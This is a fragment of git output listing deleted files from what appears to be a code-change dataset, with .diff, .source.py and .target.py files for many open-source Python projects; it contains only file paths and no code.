v1/data/codefile/intel@stacks-usecase__22cc3f0__github-issue-classification$python$rest.py.target.py delete mode 100644 v1/data/codefile/intelai@inference-model-manager__71aff3a__management$management_api$tenants$tenants_utils.py.diff delete mode 100644 v1/data/codefile/intelai@inference-model-manager__71aff3a__management$management_api$tenants$tenants_utils.py.source.py delete mode 100644 v1/data/codefile/intelai@inference-model-manager__71aff3a__management$management_api$tenants$tenants_utils.py.target.py delete mode 100644 v1/data/codefile/intelai@inference-model-manager__71aff3a__tests$conftest.py.diff delete mode 100644 v1/data/codefile/intelai@inference-model-manager__71aff3a__tests$conftest.py.source.py delete mode 100644 v1/data/codefile/intelai@inference-model-manager__71aff3a__tests$conftest.py.target.py delete mode 100644 v1/data/codefile/intelai@inference-model-manager__71aff3a__tests$management_api_tests$context.py.diff delete mode 100644 v1/data/codefile/intelai@inference-model-manager__71aff3a__tests$management_api_tests$context.py.source.py delete mode 100644 v1/data/codefile/intelai@inference-model-manager__71aff3a__tests$management_api_tests$context.py.target.py delete mode 100644 v1/data/codefile/intelai@inference-model-manager__71aff3a__tests$management_api_tests$endpoints$endpoint_utils.py.diff delete mode 100644 v1/data/codefile/intelai@inference-model-manager__71aff3a__tests$management_api_tests$endpoints$endpoint_utils.py.source.py delete mode 100644 v1/data/codefile/intelai@inference-model-manager__71aff3a__tests$management_api_tests$endpoints$endpoint_utils.py.target.py delete mode 100644 v1/data/codefile/kizniche@mycodo__047263b__mycodo$mycodo_flask$api.py.diff delete mode 100644 v1/data/codefile/kizniche@mycodo__047263b__mycodo$mycodo_flask$api.py.source.py delete mode 100644 v1/data/codefile/kizniche@mycodo__047263b__mycodo$mycodo_flask$api.py.target.py delete mode 100644 v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$__init__.py.diff delete mode 100644 v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$__init__.py.source.py delete mode 100644 v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$__init__.py.target.py delete mode 100644 v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$choices.py.diff delete mode 100644 v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$choices.py.source.py delete mode 100644 v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$choices.py.target.py delete mode 100644 v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$controller.py.diff delete mode 100644 v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$controller.py.source.py delete mode 100644 v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$controller.py.target.py delete mode 100644 v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$daemon.py.diff delete mode 100644 v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$daemon.py.source.py delete mode 100644 v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$daemon.py.target.py delete mode 100644 v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$input.py.diff delete mode 100644 v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$input.py.source.py delete mode 100644 v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$input.py.target.py delete mode 100644 v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$math.py.diff delete mode 100644 v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$math.py.source.py delete mode 100644 v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$math.py.target.py delete mode 100644 v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$measurement.py.diff delete mode 100644 v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$measurement.py.source.py delete mode 100644 v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$measurement.py.target.py delete mode 100644 v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$output.py.diff delete mode 100644 v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$output.py.source.py delete mode 100644 v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$output.py.target.py delete mode 100644 v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$pid.py.diff delete mode 100644 v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$pid.py.source.py delete mode 100644 v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$pid.py.target.py delete mode 100644 v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$settings.py.diff delete mode 100644 v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$settings.py.source.py delete mode 100644 v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$settings.py.target.py delete mode 100644 v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$sql_schema_fields.py.diff delete mode 100644 v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$sql_schema_fields.py.source.py delete mode 100644 v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$sql_schema_fields.py.target.py delete mode 100644 v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$controller_sensor.py.diff delete mode 100644 v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$controller_sensor.py.source.py delete mode 100644 v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$controller_sensor.py.target.py delete mode 100644 v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$devices$atlas_scientific_i2c.py.diff delete mode 100644 v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$devices$atlas_scientific_i2c.py.source.py delete mode 100644 v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$devices$atlas_scientific_i2c.py.target.py delete mode 100644 v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$devices$atlas_scientific_uart.py.diff delete mode 100644 v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$devices$atlas_scientific_uart.py.source.py delete mode 100644 v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$devices$atlas_scientific_uart.py.target.py delete mode 100644 v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$sensors$k30.py.diff delete mode 100644 v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$sensors$k30.py.source.py delete mode 100644 v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$sensors$k30.py.target.py delete mode 100644 v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$sensors$mh_z16.py.diff delete mode 100644 v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$sensors$mh_z16.py.source.py delete mode 100644 v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$sensors$mh_z16.py.target.py delete mode 100644 v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$sensors$mh_z19.py.diff delete mode 100644 v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$sensors$mh_z19.py.source.py delete mode 100644 v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$sensors$mh_z19.py.target.py delete mode 100644 v1/data/codefile/learningorchestra@learningorchestra__db7f132__microservices$projection_image$server.py.diff delete mode 100644 v1/data/codefile/learningorchestra@learningorchestra__db7f132__microservices$projection_image$server.py.source.py delete mode 100644 v1/data/codefile/learningorchestra@learningorchestra__db7f132__microservices$projection_image$server.py.target.py delete mode 100644 v1/data/codefile/lonelam@onlinejudgeshu__b687d20__submission$tasks.py.diff delete mode 100644 v1/data/codefile/lonelam@onlinejudgeshu__b687d20__submission$tasks.py.source.py delete mode 100644 v1/data/codefile/lonelam@onlinejudgeshu__b687d20__submission$tasks.py.target.py delete mode 100644 v1/data/codefile/malwaredllc@byob__9291b54__byob$core$security.py.diff delete mode 100644 v1/data/codefile/malwaredllc@byob__9291b54__byob$core$security.py.source.py delete mode 100644 v1/data/codefile/malwaredllc@byob__9291b54__byob$core$security.py.target.py delete mode 100644 v1/data/codefile/malwaredllc@byob__9291b54__byob$modules$ransom.py.diff delete mode 100644 v1/data/codefile/malwaredllc@byob__9291b54__byob$modules$ransom.py.source.py delete mode 100644 v1/data/codefile/malwaredllc@byob__9291b54__byob$modules$ransom.py.target.py delete mode 100644 v1/data/codefile/microsoft@nni__b955ac9__nni$experiment$config$base.py.diff delete mode 100644 v1/data/codefile/microsoft@nni__b955ac9__nni$experiment$config$base.py.source.py delete mode 100644 v1/data/codefile/microsoft@nni__b955ac9__nni$experiment$config$base.py.target.py delete mode 100644 v1/data/codefile/microsoft@nni__b955ac9__nni$experiment$config$common.py.diff delete mode 100644 v1/data/codefile/microsoft@nni__b955ac9__nni$experiment$config$common.py.source.py delete mode 100644 v1/data/codefile/microsoft@nni__b955ac9__nni$experiment$config$common.py.target.py delete mode 100644 v1/data/codefile/microsoft@nni__b955ac9__nni$tools$nnictl$common_utils.py.diff delete mode 100644 v1/data/codefile/microsoft@nni__b955ac9__nni$tools$nnictl$common_utils.py.source.py delete mode 100644 v1/data/codefile/microsoft@nni__b955ac9__nni$tools$nnictl$common_utils.py.target.py delete mode 100644 v1/data/codefile/microsoft@nni__b955ac9__nni$tools$package_utils$__init__.py.diff delete mode 100644 v1/data/codefile/microsoft@nni__b955ac9__nni$tools$package_utils$__init__.py.source.py delete mode 100644 v1/data/codefile/microsoft@nni__b955ac9__nni$tools$package_utils$__init__.py.target.py delete mode 100644 v1/data/codefile/microsoft@nni__b955ac9__test$nni_test$nnitest$run_tests.py.diff delete mode 100644 v1/data/codefile/microsoft@nni__b955ac9__test$nni_test$nnitest$run_tests.py.source.py delete mode 100644 v1/data/codefile/microsoft@nni__b955ac9__test$nni_test$nnitest$run_tests.py.target.py delete mode 100644 v1/data/codefile/microsoft@nni__b955ac9__test$nni_test$nnitest$utils.py.diff delete mode 100644 v1/data/codefile/microsoft@nni__b955ac9__test$nni_test$nnitest$utils.py.source.py delete mode 100644 v1/data/codefile/microsoft@nni__b955ac9__test$nni_test$nnitest$utils.py.target.py delete mode 100644 v1/data/codefile/milvus-io@bootcamp__89c7afc__benchmark_test$scripts$milvus_helpers.py.diff delete mode 100644 v1/data/codefile/milvus-io@bootcamp__89c7afc__benchmark_test$scripts$milvus_helpers.py.source.py delete mode 100644 v1/data/codefile/milvus-io@bootcamp__89c7afc__benchmark_test$scripts$milvus_helpers.py.target.py delete mode 100644 v1/data/codefile/milvus-io@bootcamp__a7f4c3f__solutions$question_answering_system$quick_deploy$server$src$milvus_helpers.py.diff delete mode 100644 v1/data/codefile/milvus-io@bootcamp__a7f4c3f__solutions$question_answering_system$quick_deploy$server$src$milvus_helpers.py.source.py delete mode 100644 v1/data/codefile/milvus-io@bootcamp__a7f4c3f__solutions$question_answering_system$quick_deploy$server$src$milvus_helpers.py.target.py delete mode 100644 v1/data/codefile/milvus-io@bootcamp__e5073e4__solutions$video_similarity_search$object_detection$server$src$milvus_helpers.py.diff delete mode 100644 v1/data/codefile/milvus-io@bootcamp__e5073e4__solutions$video_similarity_search$object_detection$server$src$milvus_helpers.py.source.py delete mode 100644 v1/data/codefile/milvus-io@bootcamp__e5073e4__solutions$video_similarity_search$object_detection$server$src$milvus_helpers.py.target.py delete mode 100644 v1/data/codefile/milvus-io@bootcamp__e5073e4__solutions$video_similarity_search$quick_deploy$server$src$milvus_helpers.py.diff delete mode 100644 v1/data/codefile/milvus-io@bootcamp__e5073e4__solutions$video_similarity_search$quick_deploy$server$src$milvus_helpers.py.source.py delete mode 100644 v1/data/codefile/milvus-io@bootcamp__e5073e4__solutions$video_similarity_search$quick_deploy$server$src$milvus_helpers.py.target.py delete mode 100644 v1/data/codefile/nlpia@nlpia-bot__054d5d2__qary$skills$search_fuzzy_bots.py.diff delete mode 100644 v1/data/codefile/nlpia@nlpia-bot__054d5d2__qary$skills$search_fuzzy_bots.py.source.py delete mode 100644 v1/data/codefile/nlpia@nlpia-bot__054d5d2__qary$skills$search_fuzzy_bots.py.target.py delete mode 100644 v1/data/codefile/oddluck@limnoria-plugins__2c40713__WorldTime$plugin.py.diff delete mode 100644 v1/data/codefile/oddluck@limnoria-plugins__2c40713__WorldTime$plugin.py.source.py delete mode 100644 v1/data/codefile/oddluck@limnoria-plugins__2c40713__WorldTime$plugin.py.target.py delete mode 100644 v1/data/codefile/oddluck@limnoria-plugins__33c7a3f__NBA$plugin.py.diff delete mode 100644 v1/data/codefile/oddluck@limnoria-plugins__33c7a3f__NBA$plugin.py.source.py delete mode 100644 v1/data/codefile/oddluck@limnoria-plugins__33c7a3f__NBA$plugin.py.target.py delete mode 100644 v1/data/codefile/oddluck@limnoria-plugins__33c7a3f__NHL$plugin.py.diff delete mode 100644 v1/data/codefile/oddluck@limnoria-plugins__33c7a3f__NHL$plugin.py.source.py delete mode 100644 v1/data/codefile/oddluck@limnoria-plugins__33c7a3f__NHL$plugin.py.target.py delete mode 100644 v1/data/codefile/opengisch@qfieldcloud__4377d67__web-app$qfieldcloud$urls.py.diff delete mode 100644 v1/data/codefile/opengisch@qfieldcloud__4377d67__web-app$qfieldcloud$urls.py.source.py delete mode 100644 v1/data/codefile/opengisch@qfieldcloud__4377d67__web-app$qfieldcloud$urls.py.target.py delete mode 100644 v1/data/codefile/openstack@oslo.messaging__5a842ae__oslo_messaging$_drivers$impl_kafka.py.diff delete mode 100644 v1/data/codefile/openstack@oslo.messaging__5a842ae__oslo_messaging$_drivers$impl_kafka.py.source.py delete mode 100644 v1/data/codefile/openstack@oslo.messaging__5a842ae__oslo_messaging$_drivers$impl_kafka.py.target.py delete mode 100644 v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$__init__.py.diff delete mode 100644 v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$__init__.py.source.py delete mode 100644 v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$__init__.py.target.py delete mode 100644 v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_environment_builds.py.diff delete mode 100644 v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_environment_builds.py.source.py delete mode 100644 v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_environment_builds.py.target.py delete mode 100644 v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_environment_images.py.diff delete mode 100644 v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_environment_images.py.source.py delete mode 100644 v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_environment_images.py.target.py delete mode 100644 v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_experiments.py.diff delete mode 100644 v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_experiments.py.source.py delete mode 100644 v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_experiments.py.target.py delete mode 100644 v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_pipelines.py.diff delete mode 100644 v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_pipelines.py.source.py delete mode 100644 v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_pipelines.py.target.py delete mode 100644 v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_projects.py.diff delete mode 100644 v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_projects.py.source.py delete mode 100644 v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_projects.py.target.py delete mode 100644 v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_runs.py.diff delete mode 100644 v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_runs.py.source.py delete mode 100644 v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_runs.py.target.py delete mode 100644 v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_sessions.py.diff delete mode 100644 v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_sessions.py.source.py delete mode 100644 v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_sessions.py.target.py delete mode 100644 v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_validations.py.diff delete mode 100644 v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_validations.py.source.py delete mode 100644 v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_validations.py.target.py delete mode 100644 v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$schema.py.diff delete mode 100644 v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$schema.py.source.py delete mode 100644 v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$schema.py.target.py delete mode 100644 v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$utils.py.diff delete mode 100644 v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$utils.py.source.py delete mode 100644 v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$utils.py.target.py delete mode 100644 v1/data/codefile/pgjones@faster_than_flask_article__0a70f2b__app$films.py.diff delete mode 100644 v1/data/codefile/pgjones@faster_than_flask_article__0a70f2b__app$films.py.source.py delete mode 100644 v1/data/codefile/pgjones@faster_than_flask_article__0a70f2b__app$films.py.target.py delete mode 100644 v1/data/codefile/pgjones@faster_than_flask_article__0a70f2b__app$reviews.py.diff delete mode 100644 v1/data/codefile/pgjones@faster_than_flask_article__0a70f2b__app$reviews.py.source.py delete mode 100644 v1/data/codefile/pgjones@faster_than_flask_article__0a70f2b__app$reviews.py.target.py delete mode 100644 v1/data/codefile/pgjones@faster_than_flask_article__0a70f2b__app$run.py.diff delete mode 100644 v1/data/codefile/pgjones@faster_than_flask_article__0a70f2b__app$run.py.source.py delete mode 100644 v1/data/codefile/pgjones@faster_than_flask_article__0a70f2b__app$run.py.target.py delete mode 100644 v1/data/codefile/pokainc@cfn-cross-region-export__8d0ec68__importer$lambda$cross_region_importer.py.diff delete mode 100644 v1/data/codefile/pokainc@cfn-cross-region-export__8d0ec68__importer$lambda$cross_region_importer.py.source.py delete mode 100644 v1/data/codefile/pokainc@cfn-cross-region-export__8d0ec68__importer$lambda$cross_region_importer.py.target.py delete mode 100644 v1/data/codefile/pokainc@cfn-cross-region-export__f1120d3__exporter$lambda$cross_region_import_replication.py.diff delete mode 100644 v1/data/codefile/pokainc@cfn-cross-region-export__f1120d3__exporter$lambda$cross_region_import_replication.py.source.py delete mode 100644 v1/data/codefile/pokainc@cfn-cross-region-export__f1120d3__exporter$lambda$cross_region_import_replication.py.target.py delete mode 100644 v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$IocManager.py.diff delete mode 100644 v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$IocManager.py.source.py delete mode 100644 v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$IocManager.py.target.py delete mode 100644 v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$common$models$CommonModels.py.diff delete mode 100644 v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$common$models$CommonModels.py.source.py delete mode 100644 v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$common$models$CommonModels.py.target.py delete mode 100644 v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$connection$models$ConnectionModels.py.diff delete mode 100644 v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$connection$models$ConnectionModels.py.source.py delete mode 100644 v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$connection$models$ConnectionModels.py.target.py delete mode 100644 v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$integration$models$DataIntegrationModels.py.diff delete mode 100644 v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$integration$models$DataIntegrationModels.py.source.py delete mode 100644 v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$integration$models$DataIntegrationModels.py.target.py delete mode 100644 v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$job$models$JobModels.py.diff delete mode 100644 v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$job$models$JobModels.py.source.py delete mode 100644 v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$job$models$JobModels.py.target.py delete mode 100644 v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$operation$models$DataOperationModels.py.diff delete mode 100644 v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$operation$models$DataOperationModels.py.source.py delete mode 100644 v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$operation$models$DataOperationModels.py.target.py delete mode 100644 v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$operation$models$JobSchedulerModels.py.diff delete mode 100644 v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$operation$models$JobSchedulerModels.py.source.py delete mode 100644 v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$operation$models$JobSchedulerModels.py.target.py delete mode 100644 v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$infrastructor$api$ResourceBase.py.diff delete mode 100644 v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$infrastructor$api$ResourceBase.py.source.py delete mode 100644 v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$infrastructor$api$ResourceBase.py.target.py delete mode 100644 v1/data/codefile/raptor123471@dingolingo__1d8923a__musicbot$linkutils.py.diff delete mode 100644 v1/data/codefile/raptor123471@dingolingo__1d8923a__musicbot$linkutils.py.source.py delete mode 100644 v1/data/codefile/raptor123471@dingolingo__1d8923a__musicbot$linkutils.py.target.py delete mode 100644 v1/data/codefile/rcos@observatory-retired__f970b54__observatory$dashboard$models$Screenshot.py.diff delete mode 100644 v1/data/codefile/rcos@observatory-retired__f970b54__observatory$dashboard$models$Screenshot.py.source.py delete mode 100644 v1/data/codefile/rcos@observatory-retired__f970b54__observatory$dashboard$models$Screenshot.py.target.py delete mode 100644 v1/data/codefile/rocketmap@rocketmap__2960ec6__pogom$utils.py.diff delete mode 100644 v1/data/codefile/rocketmap@rocketmap__2960ec6__pogom$utils.py.source.py delete mode 100644 v1/data/codefile/rocketmap@rocketmap__2960ec6__pogom$utils.py.target.py delete mode 100644 v1/data/codefile/sapfir0@premier-eye__a7375cc__pyfront$app$__init__.py.diff delete mode 100644 v1/data/codefile/sapfir0@premier-eye__a7375cc__pyfront$app$__init__.py.source.py delete mode 100644 v1/data/codefile/sapfir0@premier-eye__a7375cc__pyfront$app$__init__.py.target.py delete mode 100644 v1/data/codefile/shoebot@shoebot__0171fb9__shoebot$data$img.py.diff delete mode 100644 v1/data/codefile/shoebot@shoebot__0171fb9__shoebot$data$img.py.source.py delete mode 100644 v1/data/codefile/shoebot@shoebot__0171fb9__shoebot$data$img.py.target.py delete mode 100644 v1/data/codefile/slackapi@python-slack-events-api__813214e__example$blueprint$example.py.diff delete mode 100644 v1/data/codefile/slackapi@python-slack-events-api__813214e__example$blueprint$example.py.source.py delete mode 100644 v1/data/codefile/slackapi@python-slack-events-api__813214e__example$blueprint$example.py.target.py delete mode 100644 v1/data/codefile/slackapi@python-slack-events-api__813214e__example$current_app$main.py.diff delete mode 100644 v1/data/codefile/slackapi@python-slack-events-api__813214e__example$current_app$main.py.source.py delete mode 100644 v1/data/codefile/slackapi@python-slack-events-api__813214e__example$current_app$main.py.target.py delete mode 100644 v1/data/codefile/slackapi@python-slack-events-api__813214e__example$example.py.diff delete mode 100644 v1/data/codefile/slackapi@python-slack-events-api__813214e__example$example.py.source.py delete mode 100644 v1/data/codefile/slackapi@python-slack-events-api__813214e__example$example.py.target.py delete mode 100644 v1/data/codefile/slackapi@python-slack-events-api__813214e__example$working_with_proxy$example.py.diff delete mode 100644 v1/data/codefile/slackapi@python-slack-events-api__813214e__example$working_with_proxy$example.py.source.py delete mode 100644 v1/data/codefile/slackapi@python-slack-events-api__813214e__example$working_with_proxy$example.py.target.py delete mode 100644 v1/data/codefile/slackapi@python-slack-sdk__5f4d92a__tutorial$PythOnBoardingBot$app.py.diff delete mode 100644 v1/data/codefile/slackapi@python-slack-sdk__5f4d92a__tutorial$PythOnBoardingBot$app.py.source.py delete mode 100644 v1/data/codefile/slackapi@python-slack-sdk__5f4d92a__tutorial$PythOnBoardingBot$app.py.target.py delete mode 100644 v1/data/codefile/slackapi@python-slack-sdk__5f4d92a__tutorial$PythOnBoardingBot$async_app.py.diff delete mode 100644 v1/data/codefile/slackapi@python-slack-sdk__5f4d92a__tutorial$PythOnBoardingBot$async_app.py.source.py delete mode 100644 v1/data/codefile/slackapi@python-slack-sdk__5f4d92a__tutorial$PythOnBoardingBot$async_app.py.target.py delete mode 100644 v1/data/codefile/snemes@malware-analysis__02b064b__trickbot$trickbot_artifact_decrypter.py.diff delete mode 100644 v1/data/codefile/snemes@malware-analysis__02b064b__trickbot$trickbot_artifact_decrypter.py.source.py delete mode 100644 v1/data/codefile/snemes@malware-analysis__02b064b__trickbot$trickbot_artifact_decrypter.py.target.py delete mode 100644 v1/data/codefile/stefal@rtkbase__a4c347a__web_app$server.py.diff delete mode 100644 v1/data/codefile/stefal@rtkbase__a4c347a__web_app$server.py.source.py delete mode 100644 v1/data/codefile/stefal@rtkbase__a4c347a__web_app$server.py.target.py delete mode 100644 v1/data/codefile/stefal@rtkbase__cf856c0__web_app$server.py.diff delete mode 100644 v1/data/codefile/stefal@rtkbase__cf856c0__web_app$server.py.source.py delete mode 100644 v1/data/codefile/stefal@rtkbase__cf856c0__web_app$server.py.target.py delete mode 100644 v1/data/codefile/synesthesiam@voice2json__7ea7ddb__web$app.py.diff delete mode 100644 v1/data/codefile/synesthesiam@voice2json__7ea7ddb__web$app.py.source.py delete mode 100644 v1/data/codefile/synesthesiam@voice2json__7ea7ddb__web$app.py.target.py delete mode 100644 v1/data/codefile/talkiq@gcloud-aio__45d94dd__bigquery$gcloud$aio$bigquery$bigquery.py.diff delete mode 100644 v1/data/codefile/talkiq@gcloud-aio__45d94dd__bigquery$gcloud$aio$bigquery$bigquery.py.source.py delete mode 100644 v1/data/codefile/talkiq@gcloud-aio__45d94dd__bigquery$gcloud$aio$bigquery$bigquery.py.target.py delete mode 100644 v1/data/codefile/talkiq@gcloud-aio__963f347__datastore$gcloud$aio$datastore$datastore.py.diff delete mode 100644 v1/data/codefile/talkiq@gcloud-aio__963f347__datastore$gcloud$aio$datastore$datastore.py.source.py delete mode 100644 v1/data/codefile/talkiq@gcloud-aio__963f347__datastore$gcloud$aio$datastore$datastore.py.target.py delete mode 100644 v1/data/codefile/talkiq@gcloud-aio__d15540f__taskqueue$gcloud$aio$taskqueue$taskqueue.py.diff delete mode 100644 v1/data/codefile/talkiq@gcloud-aio__d15540f__taskqueue$gcloud$aio$taskqueue$taskqueue.py.source.py delete mode 100644 v1/data/codefile/talkiq@gcloud-aio__d15540f__taskqueue$gcloud$aio$taskqueue$taskqueue.py.target.py delete mode 100644 v1/data/codefile/talkpython@async-techniques-python-course__a5c04bb__src$10-async-web$acityscape_api$services$location_service.py.diff delete mode 100644 v1/data/codefile/talkpython@async-techniques-python-course__a5c04bb__src$10-async-web$acityscape_api$services$location_service.py.source.py delete mode 100644 v1/data/codefile/talkpython@async-techniques-python-course__a5c04bb__src$10-async-web$acityscape_api$services$location_service.py.target.py delete mode 100644 v1/data/codefile/talkpython@async-techniques-python-course__a5c04bb__src$10-async-web$acityscape_api$services$sun_service.py.diff delete mode 100644 v1/data/codefile/talkpython@async-techniques-python-course__a5c04bb__src$10-async-web$acityscape_api$services$sun_service.py.source.py delete mode 100644 v1/data/codefile/talkpython@async-techniques-python-course__a5c04bb__src$10-async-web$acityscape_api$services$sun_service.py.target.py delete mode 100644 v1/data/codefile/talkpython@async-techniques-python-course__a5c04bb__src$10-async-web$acityscape_api$services$weather_service.py.diff delete mode 100644 v1/data/codefile/talkpython@async-techniques-python-course__a5c04bb__src$10-async-web$acityscape_api$services$weather_service.py.source.py delete mode 100644 v1/data/codefile/talkpython@async-techniques-python-course__a5c04bb__src$10-async-web$acityscape_api$services$weather_service.py.target.py delete mode 100644 v1/data/codefile/talkpython@async-techniques-python-course__aa607bd__src$10-async-web$acityscape_api$app.py.diff delete mode 100644 v1/data/codefile/talkpython@async-techniques-python-course__aa607bd__src$10-async-web$acityscape_api$app.py.source.py delete mode 100644 v1/data/codefile/talkpython@async-techniques-python-course__aa607bd__src$10-async-web$acityscape_api$app.py.target.py delete mode 100644 v1/data/codefile/talkpython@async-techniques-python-course__aa607bd__src$10-async-web$acityscape_api$views$city_api.py.diff delete mode 100644 v1/data/codefile/talkpython@async-techniques-python-course__aa607bd__src$10-async-web$acityscape_api$views$city_api.py.source.py delete mode 100644 v1/data/codefile/talkpython@async-techniques-python-course__aa607bd__src$10-async-web$acityscape_api$views$city_api.py.target.py delete mode 100644 v1/data/codefile/talkpython@async-techniques-python-course__aa607bd__src$10-async-web$acityscape_api$views$home.py.diff delete mode 100644 v1/data/codefile/talkpython@async-techniques-python-course__aa607bd__src$10-async-web$acityscape_api$views$home.py.source.py delete mode 100644 v1/data/codefile/talkpython@async-techniques-python-course__aa607bd__src$10-async-web$acityscape_api$views$home.py.target.py delete mode 100644 